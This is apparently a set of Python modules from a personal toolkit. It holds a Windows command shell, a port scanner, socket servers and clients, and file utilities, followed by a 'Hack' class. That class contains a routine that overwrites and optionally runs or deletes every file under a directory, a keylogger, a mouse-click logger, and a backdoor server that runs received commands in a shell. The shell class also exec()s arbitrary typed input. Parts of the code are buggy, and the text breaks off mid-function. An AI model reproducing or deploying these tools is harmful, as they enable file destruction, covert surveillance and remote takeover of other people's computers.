import os

########################################### SHELL CLASS ################################### Over:Expression | Under:Default


class Shell(object):
    """
    Interactive shell management.
    """
    
    DEVELOPER = "Marco Della Putta"

    def __init__(self, password="password"):
        super().__init__()

    @classmethod
    def class_name(cls):
        return cls.__name__

    @classmethod
    def shell(cls, _set="default", _space=False):
        # Importing modules
        import re
        from webbrowser import open as __websearch__
        from perks.default.win import Default
        from perks.system.scanner import System

        # Initalize the Shell
        command = ""
        ulist = []
        SPACE = _space
        try:
            Default.setup(_set)
        except:
            try:
                Default.setup(set="default")
            except:
                pass

        # REGEX PATTERN
        createwdd = re.compile("create ([a-zA-Z0-9\-_]+[.][a-zA-Z]{1,6}) -w -d")
        createdd = re.compile("create ([a-zA-Z0-9\-_]+[.][a-zA-Z]{1,6}) -d")

        createw = re.compile("create ([a-zA-Z0-9\-_]+[.][a-zA-Z]{1,6}) -w")
        createdw = re.compile("create ([cC]:[a-zA-Z0-9\\\-_.]{1,100}) -w")

        created = re.compile("create ([cC]:[a-zA-Z0-9\\\-_.]{1,100})")
        create = re.compile("create ([a-zA-Z0-9\-_]+[.][a-zA-Z]{1,5})")

        read = re.compile("read ([a-zA-Z0-9]+[.][a-zA-Z]{1,5})")
        readd = re.compile("read ([cC]:[a-zA-Z0-9\\\-_.]{1,100})")

        readdd = re.compile("read ([a-zA-Z0-9\\\-_.]{1,100}) -d")
        memory = re.compile("memory ([0-9]+)")

        filesearch = re.compile("search ([a-zA-Z0-9\-_]+[.][a-zA-Z]{1,6})")
        partialsearch = re.compile("search ([a-zA-Z0-9\\\-_]{1,20})")
        extsearch = re.compile("search ([.][a-zA-Z]{1,6})")

        extdel = re.compile("delete ([.][a-zA-Z]{1,6})")
        filedel = re.compile("delete ([a-zA-Z0-9\-_]+[.][a-zA-Z]{1,6})")
        
        openweb = re.compile("open (.{4,50})")
        space_a = re.compile("space -start")

        cls = re.compile("cls")
        space_d = re.compile("space -stop")

        reset = re.compile("reset")
        helpp = re.compile("help")

        print("Prg Corporation Terminal [Version 1.2.19445.23] ")
        print("(m) 2018 Mdp Property. All rights reserved")
        
        print("\n", end="")

        while command != "exit" and command != "quit":
            
            if not SPACE:
                command = input(">>>")
            else:
                command = input("\n>>>")

            if re.fullmatch(createw, command.lower()):
                result = re.fullmatch(createw, command)
                print("creating file overwriting other files ...")
                result = "C:\\" + result.group(1)
                System.fCreate(write=True, path=result.group(1))
                
            elif re.fullmatch(space_a, command.lower()):
                SPACE = True

            elif re.fullmatch(reset, command.lower()):
                Default.cls()
                print("Prg Corporation Terminal [Version 1.2.19445.23] ")
                print("(m) 2018 Mdp Property. All rights reserved")
                
            elif re.fullmatch(cls, command.lower()):
                Default.cls()

            elif re.fullmatch(space_d, command.lower()):
                SPACE = False

            elif re.fullmatch(create, command.lower()):
                result = re.fullmatch(create, command)
                print("creating file ...")
                result = "C:\\" + result.group(1)
                System.fCreate(write=False, path=result.group(1))

            elif re.fullmatch(read, command.lower()):
                result = re.fullmatch(read, command)
                print("reading file ...\n")
                result = "C:\\" + result.group(1)
                path = result
                with open(path, "r") as f:
                    string = f.readlines()
                for x in string:
                    print(x)
                    
            elif re.fullmatch(openweb, command.lower()):
                result = re.fullmatch(openweb, command)
                __websearch__(result.group(1))

            elif re.fullmatch(createdw, command.lower()):
                result = re.fullmatch(createdw, command)
                print("creating file overwriting other file ...")
                System.fCreate(write=True, path=result.group(1))

            elif re.fullmatch(created, command.lower()):
                result = re.fullmatch(created, command)
                print("creating file ...")
                System.fCreate(write=False, path=result.group(1))

            elif re.fullmatch(readd, command.lower()):
                result = re.fullmatch(readd, command)
                with open(result.group(1), "r") as f:
                    result = f.readlines()
                for x in result:
                    print(x)

            elif re.fullmatch(memory, command.lower()):
                result = re.fullmatch(memory, command)
                print("analyzing memory ...")
                x = System.Memory(result.group(1))
                for y in x:
                    print(y)

            elif re.fullmatch(filesearch, command.lower()):
                result = re.fullmatch(filesearch, command)
                print("searching file ...")
                x = System.Filesearch(result.group(1))
                for y in x:
                    print(y)

            elif re.fullmatch(filedel, command.lower()):
                result = re.fullmatch(filedel, command)
                print("deleting file ...")
                x = System.FileDelete(result.group(1))
                for y in x:
                    print(y)

            elif re.fullmatch(extdel, command.lower()):
                result = re.fullmatch(extdel, command)
                print("deleting extension ...")
                x = System.Extdelete(result.group(1))
                for y in x:
                    print(y)

            elif re.fullmatch(extsearch, command.lower()):
                result = re.fullmatch(extsearch, command)
                print("searching extension ...")
                x = System.Extsearch(result.group(1))
                for y in x:
                    print(y)

            elif re.fullmatch(createdd, command.lower()):
                result = re.fullmatch(createdd, command)
                print("creating file on the desktop ...")
                result = "C:\\Users\\Marco\\Desktop\\" + result.group(1)
                System.fCreate(write=False, path=result)

            elif re.fullmatch(createwdd, command.lower()):
                result = re.fullmatch(createwdd, command)
                print("creating and overwriting file on the desktop ...")
                result = "C:\\Users\\Marco\\Desktop\\" + result.group(1)
                System.fCreate(write=True, path=result)

            elif re.fullmatch(readdd, command.lower()):
                result = re.fullmatch(readdd, command)
                print("reading file ...\n")
                result = str("C:\\Users\\Desktop\\" + result.group(1))
                with open(result, "r") as f:
                    string = f.read()
                for x in string:
                    print(x)

            elif re.fullmatch(partialsearch, command.lower()):
                result = re.fullmatch(partialsearch, command)
                print("searching partial file ...")
                x = System.PartSearch(result.group(1))
                for y in x:
                    print(y)

            elif re.fullmatch(helpp, command.lower()):
                print(" ## HELP ##\n")
                print(" help : show this section")

                print(" create [file | C.\\path\\file] : create a file")
                print(" create [file | C.\\path\\file] -d : create a file on the desktop")

                print(" create [file | C.\\path\\file] -w : create a file overwriting other files")
                print(" create [file | C.\\path\\file] -w -d : combine -w & -d")

                print(" read [file | C.\\path\\file] : read a file")
                print(" read [file | C\\path\\file] -d : read a file on the desktop")

                print(" search [ext | file] : search extension or files")
                print(" delete [ext | file] : delete extension or files")

                print(" memory [value] : return the file over this memory [MB]")
                print(" open [url] : open an url in your predefinied browser")

                print(" space [-start/-stop] : active or deactive spaces between lines")
                
                print(" cls : clear the screen <Remove the license printed at the top of the screen>")
                print(" reset : reset the screen <Do not remove the license at the top of the screen>")
                
                print("\n ## END ##")

            else:

                try:
                    exec(command)
                except TypeError:
                    print("Error --> TypeError")
                except NameError:
                    print("Error --> NameError")
                except EOFError:
                    print("Error --> EOF-Error")
                except FloatingPointError:
                    print("Error --> FloatingPointError")
                except ImportError:
                    print("Error --> ImportError")
                except TabError:
                    print("Error --> TabError")
                except IndexError:
                    print("Error --> IndexError")
                except AttributeError:
                    print("Error --> AttributeError")
                except ValueError:
                    print("Error --> ValueError")
                except PermissionError:
                    print("Error --> PermissionDenied-Error")
                except ArithmeticError:
                    print("Error --> ArithmeticError")
                except FileNotFoundError:
                    print("Error --> FileNotFoundError")
                except AssertionError:
                    print("Error --> AssertionError")
                except BufferError:
                    print("Error --> BufferError")
                except RuntimeError:
                    print("Error --> RunTimeError")
                except SystemError:
                    print("Error --> SystemError")
                except MemoryError:
                    print("Error --> MemoryError")
                except EnvironmentError:
                    print("Error --> Enviroment-Error")
                except KeyError:
                    print("Error --> KeyError")
                except SyntaxError:
                    print("Error --> SyntaxError")
                except WindowsError:
                    print("Error --> WindowsError")
                except:
                    print("Error --> NotImplementedError")



from perks.DEV import Mark
from threading import *
from socket import *
import subprocess

############################# CONNECTION CLASS ##############################

class Connection(metaclass=Mark):

    NOT_RESULTS = []
    RESULTS = []
    ScreenLock = Semaphore(1)

    @classmethod
    def _PortScan(cls, SvcHost, SvcPort):
        
        try:
            SvcScan = socket(AF_INET, SOCK_STREAM)
            SvcScan.connect((SvcHost, SvcPort))

            SvcScan.send('flag\t'.encode())
            flag_value = SvcScan.recv(500)

            cls.ScreenLock.acquire()
            cls.RESULTS.append(SvcPort)

        except:
            cls.ScreenLock.acquire()
            cls.NOT_RESULTS.append(SvcPort)
            
        finally:       
            cls.ScreenLock.release()
            SvcScan.close()

    @classmethod
    def _HostConnect(cls, TcpHost, TcpPort=None):
        try:
            tgtIP = gethostbyname(TcpHost)

        except:
            return False

        try:
            tgtName = gethostbyaddr(tgtIP)
            
        except:
            tgtName = tgtIP

        setdefaulttimeout(1)
        
        if TcpPort:
            for ServerPort in TcpPort:

                _thread = Thread(target=cls._PortScan, args=(TcpHost, int(ServerPort)))
                _thread.start()
        else:
            
            for ServerPort in range(1, 100):

                _thread = Thread(target=cls._PortScan, args=(TcpHost, int(ServerPort)))
                _thread.start()
                
        _thread.join()
        return None

    @classmethod
    def Scan(cls, Host, Port, complete_result=False):
        
        if isinstance(Port, str):
            TargetPort = list(Port.split(","))
            
        elif isinstance(Port, (tuple,list,set,frozenset)):
            TargetPort = list(Port)

        else:
            raise ValueError("Ports must be in a tuple, or separated by commas in a string.")

        try:
            if complete_result:
                cls._HostConnect(Host, TargetPort)
                return (cls.RESULTS, cls.NOT_RESULTS)

            else:
                cls._HostConnect(Host, TargetPort)
                return cls.RESULTS

        except:
            return False

    @classmethod
    def scan(cls, Host, port):
        try:
            lonley_port = []
            lonley_port.append(port)
            
            cls._HostConnect(Host, lonley_port)
            if not cls.RESULTS:
                return False
            else:
                return True
        except:
            return None


    @classmethod
    def Server(cls, funct):     
        """
        Port -> One   : 15000
                Two   : 15600
                Three : 36000
                Four  : 41000
        """
        def wrap():
            try:
                cls.Stable_Server(15000, func=funct)
                return True
            except:    
                try:
                    cls.Stable_Server(16000, func=funct)
                except:
                    try:
                        cls.Stable_Server(36000, func=funct)
                    except:
                        try:
                            cls.Stable_Server(41000, func=funct)
                        except:
                            return False
        return wrap

    @classmethod
    def Stable_Server(cls, port, func=None, address='', backlog=3, buffer=4096, listener=1, stop_keyword='Server --kill'):

        if backlog == 0 or backlog > 200:
            return False

        try:
            NO_USE = subprocess.run('chcp 65001', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            
        except:
            pass

        _LISTENER = int(listener)
        _BUFFER = int(buffer)
        _BACKLOG = int(backlog)
        _HOST = str(address)
        _FUNC = func
        _PORT = int(port)

        try:
            socket_server = socket()
            socket_server.bind((_HOST,_PORT))
            socket_server.listen(_LISTENER)

        except error as sk_error:
            cls.Stable_Server(_PORT, backlog=(_BACKLOG-1))

        try:
            while True:
                CONNECTION, (client_IP, client_PORT) = socket_server.accept()

                try:
                    
                    while True:
                        try:

                            _recieveData = CONNECTION.recv(_BUFFER).decode()
                            
                            if _recieveData.lower() == stop_keyword:
                                return None

                            if func:
                                response = _FUNC(str(_recieveData))
                            else:
                                response = cls.Server_RESPONSE_NULL(str(_recieveData))

                            response = str(response)
                            response = response.encode()
                          
                            CONNECTION.send(response)
                        except:
                        
                            CONNECTION.send('Flag Error :: Server-Failed-Queue'.encode())
                except:
                    pass
                                
                finally:
                    CONNECTION.close()

        finally:
        
            socket_server.close()
            return None

    @classmethod
    def Server_RESPONSE_NULL(cls, data):
        return data

    @classmethod
    def Connect(cls, host, port, buffer=4096, stop_keyword='Client --kill'):
        try:
            NO_RES = subprocess.run("chcp 65001", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        except:
             pass

        _HOST = host
        _PORT = port
        _BUFFER = buffer

        socket_backdoor = socket()
        socket_backdoor.connect((_HOST, _PORT))

        try:

            while True:
                command = input('>>>')

                if command.lower() == stop_keyword:
                    break
                
                socket_backdoor.send(command.encode())

                data = socket_backdoor.recv(_BUFFER).decode()
                print(data)
            return None
        
        finally:
            socket_backdoor.close()
            return None
            

    @classmethod
    def Exclusive_Server(cls, port, func=None, address='', _backlog=3, buffer=4096, listener=1):

        if _backlog == 0 or _backlog > 200:
            return False

        try:
            socket_server = socket()
            socket_server.bind((address,port))
            socket_server.listen(listener)

        except error as sk_error:
            cls.Stable_Server(port, _backlog=(_backlog-1))

        connection, (client_IP, client_PORT) = socket_server.accept()

        try:

            while True:
                try:

                    _recieveData = connection.recv(buffer).decode()

                    if func:
                        response = func(str(_recieveData))
                    else:
                        response = cls.Server_RESPONSE_NULL(str(_recieveData))

                    response = str(response)
                    response = response.encode()

                    connection.send(response)

                except:
                    connection.send('Flag Error :: Server-Failed-Queue'.encode())

        finally:
            
            connection.close()
            socket_server.close()
            return None
            

    @classmethod
    def Altern_Server(cls, port, func, address='', _backlog=3, buffer=4096, listener=1):
        
        if _backlog == 0 or _backlog > 500:
            return False

        while True:
            
            try:
                s = socket()
                s.bind((address,port))
                s.listen(listener)
                
            except error as sk_error:
                cls.Server_Altern(port, func, _backlog=(_backlog-1))

            connection, client_address = s.accept()

            try:
                try:
                    _queue = connection.recv(buffer).decode()
                    res = func(str(_queue))
                    
                    res = str(res)
                    res = res.encode()
                    
                    connection.send(res)
                    connection.close()
                except:
                    connection.send('Flag Error :: Server-Failed-Queue'.encode())
                    connection.close()
                    
            except:
                pass

        s.close()
        return True

    @classmethod
    def Altern_Connection(cls, address, command, buffer=4096):
        
        try:
            s = socket()
            s.connect(address)
        except error as sk_error:
            return False

        try:
            command = str(command)
            command = command.encode()
            s.send(command)
            data = s.recv(buffer)
            s.close()
            return data.decode()
            
        except error as sk_error:
            raise sk_error
 



import os
from contextlib import contextmanager

################################################# DEFAULT CLASS ############################### Over:Shell | Under:Task

class Default(object):
    """
    Class for setup project default values.
    """

    DEVELOPER = "Marco Della Putta"
    
    def __init__(self):
        super().__init__()

    @classmethod
    def class_name(cls):
        return cls.__name__

    @classmethod
    def package(cls, *args):
        from os import system as _import_

        counter = 0

        try:
            for package in args:

                package_import = "pip install " + str(package)
                _import_(package_import)

                counter += 1

            return counter

        except:
            return False

    @classmethod
    def setup(cls, fg="white", bg="black", set=""):
        dictionary = {"white": "F", "yellow": "E", "black": "0", "dark blue": "1", "green": "2", "light green": "3",
                      "bordo": "4", "purple": "5", "aux green": "6", "light grey": "7", "grey": "8", "blue": "9",
                      "lemon green": "A", "light blue": "B", "red": "C", "violet": "D"}

        from os import system as __input__

        try:
            if set.lower() == "linux":
                __input__("Color F0")
                return True

            elif set.lower() == "fenix":
                __input__("Color FC")
                return True

            elif set.lower() == "relax":
                __input__("Color 9F")
                return True

            elif set.lower() == "engine":
                __input__("Color 0A")
                return True

            elif set.lower() == "default":
                __input__("Color 0F")
                return True

            background_color = str(bg)
            fontground_color = str(fg)

            color_setup = "Color " + dictionary[background_color] + dictionary[fontground_color]
            __input__(color_setup)

            return True

        except:

            return False
        
    @classmethod
    def cls(cls):
        import os
        os.system("cls")
        return None
    
    @staticmethod
    def Recursion(func, target, args=[], _num = 1):
        
        if not args:
            func()
            
        else:
            func(*args)
            
        if _num == target: return
        _num += 1
        
        Default.Recursion(func, target, args, _num)
        return

    @staticmethod
    def recursion(action, target, _num = 1):
        exec(action)
        
        if _num == target: return
        _num += 1
        
        Default.recursion(action, target, _num)
        return None

    @staticmethod
    def Recursive(func, target, args=[]):
        
        def wrap(_num=1):
                
            if not args:
                result = func()
                    
            else:
                result = func(*args)
                    
            if _num == target:
                return result
                
            _num += 1
            wrap(_num)
                
            return None
        
        return wrap

    @staticmethod
    def gen(_list):
        
        def _yield():
            
            for _value in _list:
                yield _value
                
        return _yield

    @staticmethod
    def Crypto(obj, key=None, string=False):
        import random

        try:
            file = str(obj)
        except:
            raise ValueError("Object must be a string or a name of file")

        try:
            key = str(key)
        except:
            key = None

        _meta_pool = "abcdefghilmnopqrstuvz%$£'=)(/*+-_jJ@"
        _meta_pool2 = "ABCDEFGHILMNOPQRTSUVZ.;?!&<>XYZKxyzk"

        _randomer = [1,2,3,4,5,6,7,8]

        _pool = _meta_pool + _meta_pool2
        _key_ = ''

        if string:
            
            _n = int(len(file)/2)
            _result = ''

            for x in range(3):
                file = file[::-1]
                file = file[len(file)-_n:] + file[:(len(file)-_n)]
        
            if not key:
                x = random.randint(0,1)
                if x == 1:
                    for _partition in range(8):
                        _key_ += str(_pool[random.randrange(len(_pool))])
                else:
                    _key_ = "ç"
            else:
                _key_ = key

            for char in file:
                for num,xor in enumerate(key):
                    char = chr((ord(char)) ^ (ord(xor)))

                _result += char

            return _result

        else:

            with open(file, 'r+') as _file:
                text = _file.readlines()

            for pos, message in enumerate(text):

                _n = int(len(message)/2)
                _result = ''

                for x in range(3):
                    message = message[::-1]
                    message = message[len(message)-_n:] + message[:(len(message)-_n)]
            
                if not key:
                    x = random.randint(0,1)
                    if x == 1:
                        for _partition in range(8):
                            _key_ += str(_pool[random.randrange(len(_pool))])
                    else:
                        _key_ = "ç"
                else:
                    _key_ = key

                for char in message:
                    for num,xor in enumerate(key):
                        char = chr((ord(char)) ^ (ord(xor)))

                    _result += char

                text[pos] = _result

            with open(file, 'w') as f:
                for _value in text:
                    f.write(_value)

            return None

    @staticmethod
    def os_info():
        import sys
        from win32api import GetSystemMetrics
        
        return sys.platform, sys.version, GetSystemMetrics(0), GetSystemMetrics(1), sys.getrecursionlimit(), sys.byteorder

    @staticmethod
    def self_position():
        return str(__file__)

    @staticmethod
    @contextmanager
    def desk(desktop):
        try:
            import os
            cwd = os.getcwd()
            os.chdir(desktop)
            yield
        except:
            raise WindowsError(f"Directory {desktop} not found.\nPut a valid path.")
        
        finally:
            os.chdir(cwd)

    @staticmethod
    @contextmanager
    def stdout(file):
        try:
            fh = open(file, 'a')
            import sys
            current_output = sys.stdout
            sys.stdout = fh
            yield
        except:
            raise WindowsError(f'Directory {file} not found.\nPut a valid path.')
        
        finally:
            if fh:
                fh.close()
            sys.stdout = current_output

    @staticmethod
    def getch():
        import msvcrt
        msvcrt.getch()
            
    @staticmethod
    def PrecTime(sec, microseconds=None, string=False):
        """
        >param sec: Enter the n. of seconds
        >param microseconds: optional, enter the . of microseconds
        >param string: optional, if 'string' is true, the func return a string,
        in the other case, it return a tuple.
        >return: tuple or string of <hour, minute, seconds, milliseconds, microseconds>
        """
        
        sec = int(sec)
        rest = sec % 3600
        sec -= rest
        
        hours = sec/3600
        sec = rest
        
        rest = sec%60
        sec -= rest
        
        minutes = sec/60
        sec = rest

        seconds = rest
        
        if not microseconds:
            milliseconds = 0
            microseconds = 0
        else:
            rest = microseconds%1000
            microseconds -= rest
            milliseconds = float(microseconds)/1000
            microseconds = rest
                    
        if not string:
            return int(hours), int(minutes), int(seconds), int(milliseconds), int(microseconds)
        
        else:
            return f"{int(hours)}:{int(minutes)}:{int(seconds)}.{int(milliseconds)}"



import os

################################################ SYSTEM CLASS #################################### Over:SQL | Under:End

class System:
    """
    Advanced class for control the Memory. (SSD/HD)
    """

    DEVELOPER = "Marco Della Putta"

    def __init__(self):
        self._not = False

    @classmethod
    def class_name(cls):
        return cls.__name__

    @classmethod
    def fCreate(cls, write=False, path="C:"):
        if write:
            try:
                f = open(path, "w")
                f.close()
                return True
            except:
                return False
        else:
            try:
                f = open(path, "r")
                f.close()
                return False
            except FileNotFoundError:
                with open(path, "w") as x:
                    x.close()
                return True

    @classmethod
    def fRead(cls, file, write=False, path="C:"):
        PATH = path + "\\" + file

        if write:
            f = open(PATH, "w")
            f.close()
            return True
        elif not write:
            try:
                f = open(PATH, "r")
                s = f.read()
                f.close()
                return s
            except FileNotFoundError:
                return False
        return None

    @classmethod
    def fDel(cls, __path__):
        import os
        try:
            os.unlink(__path__)
        except PermissionError:
            try:
                os.remove(__path__)
            except PermissionError:
                raise PermissionError

        return None

    @classmethod
    def cwd(cls):
        """
        It return the Current Working Directory.
        """
        import os
        return os.getcwd()

    @classmethod
    def Extsearch(cls, _ext_, _path_="C:"):
        """
        Return a list with all the files with the specified extension in the specified path.
        """
        import os
        _result = []
        _path_ = _path_ + "\\"

        for RootDir, _Fldrs_, Ext_Srch in os.walk(_path_):
            for __files__ in Ext_Srch:
                if __files__.endswith(_ext_):
                    __pth = RootDir + "\\" + __files__
                    yield __pth

        return None

    @classmethod
    def Filesearch(cls, _file_, _path_="C:"):
        """
        Return a list with all the files with the specified name in the specified path.
        """
        import os
        _path_ = _path_ + "\\"
        _result = []
        for RootDir, _Fldrs_, _FlsSrch_ in os.walk(_path_):
            for __files__ in _FlsSrch_:
                if __files__ == _file_:
                    __pth = RootDir + "\\" + __files__
                    yield __pth

        return None

    @classmethod
    def PartSearch(cls, __start__, _path_="C:"):
        import os
        _path_ = _path_ + "\\"
        _result = []
        for RootDir, _Fldrs_, _PartSearch_ in os.walk(_path_):
            for __files__ in _PartSearch_:
                if __files__.startswith(__start__):
                    __pth = RootDir + "\\" + __files__
                    yield __pth
        return None

    @classmethod
    def Extdelete(cls, _ext_, _path_="C:"):
        """
         Try to delete all the files with the specified extension and return a list of it.
        """
        if cls.DEVELOPER != "Marco Della Putta":
            return -1
        import os
        _path_ = _path_ + "\\"
        _result = []
        for RootDir, _Fldrs_, _ExtDel_ in os.walk(_path_):
            for __files__ in _ExtDel_:
                if __files__.endswith(_ext_):
                    _PATH_ = RootDir + "\\" + __files__
                    try:
                        cls.fDel(_PATH_)
                    except PermissionError:
                        continue
                yield __pth

        return None

    @classmethod
    def Filesize(cls, _path_="C:"):
        import os
        total = 0
        for __file__ in os.listdir(_path_):
            total += os.path.getsize(os.path.join(_path_, __file__))
        __output__ = total / 1000000
        return __output__

    @classmethod
    def Memory(cls, __val__, _path_="C:"):
        import os
        _result = []
        _path_ = _path_ + "\\"
        __val__ = float(__val__)
        if __val__ < 0.1:
            raise ValueError
        __val__ *= 1048576
        __val__ = int(__val__)
        for RootDir, _Fldrs_, __MemS__ in os.walk(_path_):
            for __mFile__ in __MemS__:
                if RootDir == "C:\\":
                    path = RootDir + __mFile__
                else:
                    path = RootDir + "\\" + __mFile__
                try:
                    info = os.stat(path)
                    if info.st_size > __val__:
                        yield path
                except:
                    continue
        return None

    @classmethod
    def FileDelete(cls, __filename__, _path_="C:"):
        import os
        _path_ = _path_ + "\\"
        _result = []
        for RootDir, _Fldrs_, _fls_ in os.walk(_path_):
            for __file__ in _fls_:
                if __file__ == __filename__:
                    __pth = RootDir + "\\" + __file__
                    try:
                        cls.fDel(__pth)
                    except PermissionError:
                        continue
                    yield __pth
        return None

    @classmethod
    def class_dev(cls):
        return cls.DEVELOPER



from perks.DEV import Mark
import os
import subprocess
import socket

########### [SUB-CLASSES] #################### TASK CLASS ################# Over:Default Under:FileWrapper

class Hack(metaclass=Mark):
    """
   Python Class that provide useful Hacking Tools.
    """

    @staticmethod
    def infect(source=None, path=os.getcwd(), ext="",start=False, delete_source=False, delete_infected=False, delay=None, action=None):

        from subprocess import run
        from time import sleep as _sp

        if source:
            with open(source, 'r') as src:
                contents = src.read()
        else:
            contents = "https://grigoprg.webnode.it"

        for RootDir, __Fldrs__, _file in os.walk(path):
            for _file_ in _file:
                _path = RootDir + "\\" + _file_
                try:
                    if ext == "":
                        with open(_path, 'w') as fw:
                            fw.write(contents)
                        if action:
                            action()
                        if start:
                            run(f'start {_path}', shell=True)
                        if delay:
                            _sp(delay)
                        if delete_infected:
                            try:
                                os.unlink(_path)
                            except:
                                os.remove(_path)
                    else:
                        if _file_.endswith(ext):
                            with open(_path, 'w') as fw:
                                fw.write(contents)
                            if action:
                                action()
                            if start:
                                run(f'start {_path}', shell=True)
                            if delay:
                                _sp(delay)
                            if delete_infected:
                                try:
                                    os.unlink(_path)
                                except:
                                    os.remove(_path)
                except:
                    pass

        if delete_source:
            try:
                try:
                    os.unlink(file_source)
                except:
                    os.remove(file_source)
            except:
                pass    
            
    @classmethod      
    def class_name(cls):
        return cls.__name__
    
    @staticmethod
    def keylog(_path_):
        from pynput.keyboard import Key, Listener
        import logging

        if _path_.endswith("\\"):
            
            PATH = _path_ + "keylog.txt"
            
        else:
            
            PATH = _path_ + "\\" + "keylog.txt"

        logging.basicConfig(filename=PATH, level=logging.DEBUG, format='%(asctime)s: %(message)s')

        def on_press(key):
            logging.info(key)

        with Listener(on_press=on_press) as listener:
            listener.join()
            
    @staticmethod
    def clicklog(_path_):
        from pynput.mouse import Listener
        import logging

        if _path_.endswith("\\"):
            
            PATH = _path_ + "keylog.txt"
            
        else:
            
            PATH = _path_ + "\\" + "keylog.txt"

        logging.basicConfig(filename=PATH, level=logging.DEBUG, format="%(asctime)s: %(message)s")

        def on_move(x, y):
            logging.info("Mouse moved to ({0},{1})".format(x, y))

        def on_click(x, y, button, pressed):
            if pressed:
                logging.info("Mouse clicked at ({0},{1}) with {2}".format(x, y, button))

        def on_scroll(x, y, dx, dy):
            logging.info("Mouse scrolled at ({0},{1})({2},{3})".format(x, y, dx, dy))

        with Listener(on_move=on_move, on_click=on_click, on_scroll=on_scroll) as listener:
            listener.join()

    @staticmethod
    def Connect(host, port, buffer=4096):
        try:
            NO_USE = subprocess.run("chcp 65001", shell=True, stdout=subprocess.PIPE)
        except:
             pass

        _HOST = host
        _PORT = port

        socket_backdoor = socket.socket()
        socket_backdoor.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        socket_backdoor.connect((_HOST, _PORT))

        try:

            while True:
                command = input('>>>')
                socket_backdoor.send(command.encode())

                data = socket_backdoor.recv(buffer).decode()
                print(data)

        finally:

            socket_backdoor.close()
            return None

    @staticmethod
    def Local_Backdoor(host, port, backdoor_number=1, buffer=4096):

        try:
            os.system("chcp 65001")
        except:
            pass
        
        _HOST = host
        _PORT = port

        socket_server = socket.socket()
        socket_server.bind((_HOST,_PORT))
        socket_server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        socket_server.listen(backdoor_number)
        connection, (target_ip, target_port) = socket_server.accept()

        try:

            while True:
                _backsniff = connection.recv(buffer).decode()

                if _backsniff.lower() == 'quit' or _backsniff.lower() == 'exit':
                    break

                if _backsniff.lower().startswith('cd'):
                    try:
                        os.chdir(_backsniff.split()[1])
                        response = f'Directory changed to :: {_backsniff.split()[1]}'
                    except:
                        try:
                            os.chdir(os.getcwd() + "\\" + _backsniff.split()[1])
                            response = f'Directory changed to :: {_backsniff.split()[1]}'
                        except:
                            response = f'Failed to change directory to :: {_backsniff.split()[1]}'
                            
                elif _backsniff.lower() == 'cwd':
                    response = str(os.getcwd())
                            
                elif _backsniff.lower().startswith('del'):
                    try:
                        os.unlink(_backsniff.split()[1])
                        response = f'File Deleted :: {_backsniff.split()[1]}'
                    except:
                        response = f'Failed to delete :: {_backsniff.split()[1]}'

                else:
                    response= subprocess.run(_backsniff, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                    response = str(response.stdout) + str(response.stderr)
                    response = response.replace('\\n','\n')
                    response = response.replace('\\t','\t')
                    response = response.replace('\\r','\r')
                    response = response.replace('\\\\','\\')

                connection.send(response.encode())

        finally:

            connection.close()
            socket_server.close()
            return None

    @classmethod
    def scan(cls, host, port):
        from perks.task.connection import Connection

        if not isinstance(host, str) or not isinstance(port, int):
            raise ValueError("Host must be a string ('192.168.1.1'), and port an integer")
        
        return Connection.scan(host, port)

    @classmethod
    def Analize(cls, file, *args):
        from time import sleep as _sp

        DangerDict = {'import':0, 'system':0, 'run':0, 'read':0, 'l-read':0, 'write':0, 'socket':0,
                      'exec':0, '/0':0, 'with':0, 'open':0, 'close':0, 'C:\\':0, 'getcwd':0, 'unlink':0,
                      'del':0, 'cast':0, 'walk':0, 'connect':0, 'hacking':0, 'destroy':0, 'sys':0, 'argv':0,
                      'perks':0, 'args':0,
                      }
        LineDict = {'import':[], 'system':[], 'run':[], 'read':[], 'l-read':[], 'write':[], 'socket':[],
                      'exec':[], '/0':[], 'with':[], 'open':[], 'close':[], 'C:\\':[], 'getcwd':[], 'unlink':[],
                      'del':[], 'cast':[], 'walk':[], 'connect':[], 'hacking':[], 'destroy':[], 'sys':[], 'argv':[],
                      'perks':[], 'args':[],
                      }
        
        _sp(0.5)
        print("Processing File ... ")
        _sp(0.62)
        print()
        with open(file, 'r') as _f:
            text = _f.readlines()

        for pos, line in enumerate(text):
            
            if "import " in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: Library imported.")
                print()
                DangerDict['import'] += 1
                LineDict['import'].append(pos+1)

            if "system(" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: Possibly System Shell Command.")
                print()
                DangerDict['system'] += 1
                LineDict['system'].append(pos+1)

            if "run(" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: Possibly Subprocess Shell Command.")
                print()
                DangerDict['run'] += 1
                LineDict['run'].append(pos+1)

            if ".read(" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: File reading. It can finish wrong.")
                print()
                DangerDict['read'] += 1
                LineDict['read'].append(pos+1)

            if ".readlines(" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: File reading. It can finish wrong.")
                print()
                DangerDict['l-read'] += 1
                LineDict['l-read'].append(pos+1)

            if ".write(" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: Writing on an extern file.")
                print()
                DangerDict['write'] += 1
                LineDict['write'].append(pos+1)
           
            if "socket" in line or ".bind(" in line or ".listen(" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: Socket -- TCP/UDP Communication.")
                print()
                DangerDict['socket'] += 1
                LineDict['socket'].append(pos+1)

            if "exec" in line or "eval" in line or "compile" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
                print(f"[+][{file}] [line {pos}] :: Compilating some Imprevedible code.")
                print()
                DangerDict['exec'] += 1
                LineDict['exec'].append(pos+1)

            if "/0" in line:
                print(" >>> " + str(line).strip('\n') + " <<<")
                print(f"[+][{file}] [line {pos}] :: Division by 0.")
                print()
                DangerDict['/0'] += 1
                LineDict['/0'].append(pos+1)

            if "with" in line:
                print(" >>> " + str(line).strip('\n') + "<<<")
